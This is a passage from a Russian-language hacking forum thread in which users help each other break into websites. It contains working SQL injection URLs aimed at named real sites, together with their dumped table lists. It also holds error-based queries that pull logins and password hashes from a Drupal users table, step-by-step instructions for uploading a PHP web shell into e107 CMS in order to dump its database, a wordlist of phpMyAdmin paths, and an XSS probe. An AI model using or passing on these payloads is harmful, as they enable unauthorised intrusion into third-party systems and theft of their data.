Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    http://www.airport.lg.ua/index.php?page=-3+union+select+group_concat(0x0b,table_name)+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+--+


    aero_buttons,
    aero_pages,
    aero_pics_pages,
    aero_texts
     
  2. Dima282

    Dima282 Banned

    Joined:
    14 Jun 2007
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Помогите составить запрос. Есть 5 бд, в бд 'de' есть таблица drupal_users, и там есть поля pass,access,login.
    При запросе +or+1+group+by+concat((select+concat( login,0x3a,pass)+from+drupal_users+limit+0,1),floor(rand(0)*2))having+min(0)+or+1+--+
    запрос идет в 'de' а в другую бд.
     
  3. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    http://www.tis.lg.ua/index.php?mod=page&page=-23'+union+select+1,group_concat(0x0b,table_name),3,4+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+--+

    gb_aut,
    gb_ip,
    gb_msg,
    gb_settings,
    lib_mat,
    lib_plan,
    lib_razdel,
    lib_reelt,
    lib_status,
    lib_tip,
    newnews,
    page,
    phonebook,
    photo,
    pr_dom,
    pr_kvartira,
    pr_nejil,
    pr_zemlya
     
  4. aka_zver

    aka_zver Elder - Старейшина

    Joined:
    17 Sep 2009
    Messages:
    471
    Likes Received:
    330
    Reputations:
    73
    Если я правильно понял эту мысль, то:
    Code:
    +or+1+group+by+concat((select+concat(access,0x3a,login,0x3a,pass)+from+de.drupal_users+limit+0,1),floor(rand(0)*2))having+min(0)+or+1+--+
    всё по принципу select+колонки+from+бд.таблица
     
    1 person likes this.
  5. Dima282

    Dima282 Banned

    Joined:
    14 Jun 2007
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Подскажите в чем ошибка?
    http://www.urvet.ru/index.php?categoryID='+or+1+group+by+concat((select+table_ name+from+information_schema.tables+where+table_ schema='z33576_shop'+limit+0,1),fl oor(rand(0)*2))having+min(0)+or+1+--+
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.urvet.ru/index.php?categoryID=1+or+1+group+by+concat((select+table_name+from+information_schema.tables+where+table_schema=0x7a33333537365f73686f70+limit+0,1),floor(rand(0)*2))having+min(0)+or+1--+
     
    _________________________
  7. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    Еще актуально

    Тут описание данного бага
    http://seclists.org/fulldisclosure/2011/Feb/254

    Если этот раскрутить не удается предположительно есть еще одна бага тут
    http://zombie.cloud9crew.com/index.php?option=com_kunena&Itemid=86&func=announcement&do=

    Описание тут
    http://www.exploit-db.com/exploits/11279/

    тут есть эксплойт
    http://www.exploit-db.com/exploits/9408/
     
  8. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    Из information_schema таблицы и колонки выводятся нормально, но вывод из таблиц не происходит. Какие есть альтернативы вот этому?
    ...5,6,login,pass+from+users+limit+0,1--
     
  9. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    Узнаешь table_schema > select 1,table_schema,3 from information_schema.tables where table_name='table_name'--
    Выводишь данные > select 1,concat_ws(0x3a,username,password),3 from table_schema.table_name
     
  10. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    Помню раньше на ачате была тема, а в ней предположительные диры где установлен pma, так вот искал и здесь и в гугле что то не нашел, может у кого есть?
     
  11. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    спс, там их 6 оказалось)
     
    #16431 asql, 20 Mar 2011
    Last edited: 20 Mar 2011
  12. [R]eD

    [R]eD Elder - Старейшина

    Joined:
    1 Aug 2006
    Messages:
    72
    Likes Received:
    1
    Reputations:
    0
    Как можно залить шелл в e107 CMS если стоит ограничение через filetypes.php, т.е. через плагины/темы загрузить нельзя...
    цель - слить бд

    помогите :(
     
  13. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    https://rdot.org/forum/showthread.php?t=3 пост Strilo4ka.
    Если не понял, то просто создаешь форму у себя на компе:
    PHP:
    <form enctype="multipart/form-data" action="http://[host]/[path]/e107_languages/lan_banner.php" method="post">
    Отправить этот файл: <input name="file" type="file" value='b.php' /><br>
    Название шелла! <input name="p" type="text" value="b.php">
    <
    input type="submit" value="Send File" />
    </
    form>
    Заходишь e107_admin/language.php?tools . Там редактируешь файл lan_banner.php вписав в него ");?><?copy($_FILES[file][tmp_name],$_POST[p])?> .
    Затем через форму которую создал льешь шелл. Он будет по адресу http://[host]/[path]/e107_languages/shell.php
     
  14. Compton

    Compton Member

    Joined:
    31 Jan 2010
    Messages:
    290
    Likes Received:
    25
    Reputations:
    0
    Code:
    web/phpMyAdmin/
    admin/pma/
    admin/phpmyadmin/
    admin/mysql/
    phpmyadmin2/
    mysqladmin/
    mysql-admin/
    phpMyAdmin-2.5.6/
    phpMyAdmin-2.5.4/
    phpMyAdmin-2.5.1/
    phpMyAdmin-2.2.3/
    phpMyAdmin-2.2.6/
    myadmin/
    phpMyA/
    phpmyad/
    phpMyAdmin-2.6.0/
    phpMyAdmin-2.6.0-pl1/
    phpMyAdmin-2.6.3-pl1/
    phpMyAdmin-2.6.3/
    phpMyAdmin-2.6.3-rc1/
    phpMyAdmin-2.6.2-rc1/
    phpMyAdmi/
    phpMyAdmin1/
    phpMyAdmin2/
    phpMyAdmin-2/
    phpMyAdmin-2.10.0/
    phpMyAdmin-2.3.0/
    phpMyAdmin-2.3.1/
    phpMyAdmin-2.3.2/
    phpMyAdmin-2.3.3/
    phpMyAdmin-2.3.4/
    phpMyAdmin-2.3.5/
    phpMyAdmin-2.3.6/
    phpMyAdmin-2.3.7/
    phpMyAdmin-2.3.8/
    phpMyAdmin-2.3.9/
    phpMyAdmin-2.4.0/
    phpMyAdmin-2.4.1/
    phpMyAdmin-2.4.2/
    phpMyAdmin-2.4.3/
    phpMyAdmin-2.4.4/
    phpMyAdmin-2.4.5/
    phpMyAdmin-2.4.6/
    phpMyAdmin-2.4.7/
    phpMyAdmin-2.4.8/
    phpMyAdmin-2.4.9/
    phpMyAdmin-2.5.0/
    phpMyAdmin-2.5.1/
    phpMyAdmin-2.5.2/
    phpMyAdmin-2.5.3/
    phpMyAdmin-2.5.4/
    phpMyAdmin-2.5.5/
    phpMyAdmin-2.5.6/
    phpMyAdmin-2.5.7/
    phpMyAdmin-2.5.8/
    phpMyAdmin-2.5.9/
    phpMyAdmin-2.6.0/
    phpMyAdmin-2.6.1/
    phpMyAdmin-2.6.2/
    phpMyAdmin-2.6.3/
    phpMyAdmin-2.6.4/
    phpMyAdmin-2.6.5/
    phpMyAdmin-2.6.6/
    phpMyAdmin-2.6.7/
    phpMyAdmin-2.6.8/
    phpMyAdmin-2.6.9/
    phpMyAdmin-2.7.0/
    phpMyAdmin-2.7.1/
    phpMyAdmin-2.7.2/
    phpMyAdmin-2.7.3/
    phpMyAdmin-2.7.4/
    phpMyAdmin-2.7.5/
    phpMyAdmin-2.7.6/
    phpMyAdmin-2.7.7/
    phpMyAdmin-2.7.8/
    phpMyAdmin-2.7.9/
    phpMyAdmin-2.8.1/
    phpMyAdmin-2.8.2/
    phpMyAdmin-2.8.3/
    phpMyAdmin-2.8.4/
    phpMyAdmin-2.8.5/
    phpMyAdmin-2.8.6/
    phpMyAdmin-2.8.7/
    phpMyAdmin-2.8.8/
    phpMyAdmin-2.8.9/
    phpMyAdmin-2.9.1/
    phpMyAdmin-2.9.2/
    phpMyAdmin-3/
    phpMyAdmin-4/
    phpMyAds/
    phpmyad-sys/
    
     
  15. [R]eD

    [R]eD Elder - Старейшина

    Joined:
    1 Aug 2006
    Messages:
    72
    Likes Received:
    1
    Reputations:
    0
    теперь не хаватает прав ((
    видимо больше способов нету (
     
  16. KREGI

    KREGI Banned

    Joined:
    9 Feb 2009
    Messages:
    42
    Likes Received:
    3
    Reputations:
    1
    привет
    есть сайт на DLE, версию не знаю
    есть уязвимость вида
    Code:
    http://site.ru/index.php?subaction=userinfo&user=%2527
    при подстановки sql запроса, все что я написал выводится в title, мб кто сталкивался с раскруткой такой inj :confused:
     
  17. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Быть может это и не sql inj вовсе?
     
  18. KREGI

    KREGI Banned

    Joined:
    9 Feb 2009
    Messages:
    42
    Likes Received:
    3
    Reputations:
    1
    хм, а что же?
     
  19. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Да ничего, обычный вывод в тайтл.
    Попробуй ввести туда
    PHP:
    </title><script>alert(/1/)</script>
    Может xss будет :)
     
  20. KREGI

    KREGI Banned

    Joined:
    9 Feb 2009
    Messages:
    42
    Likes Received:
    3
    Reputations:
    1
    там защита от xss
     
Thread Status:
Not open for further replies.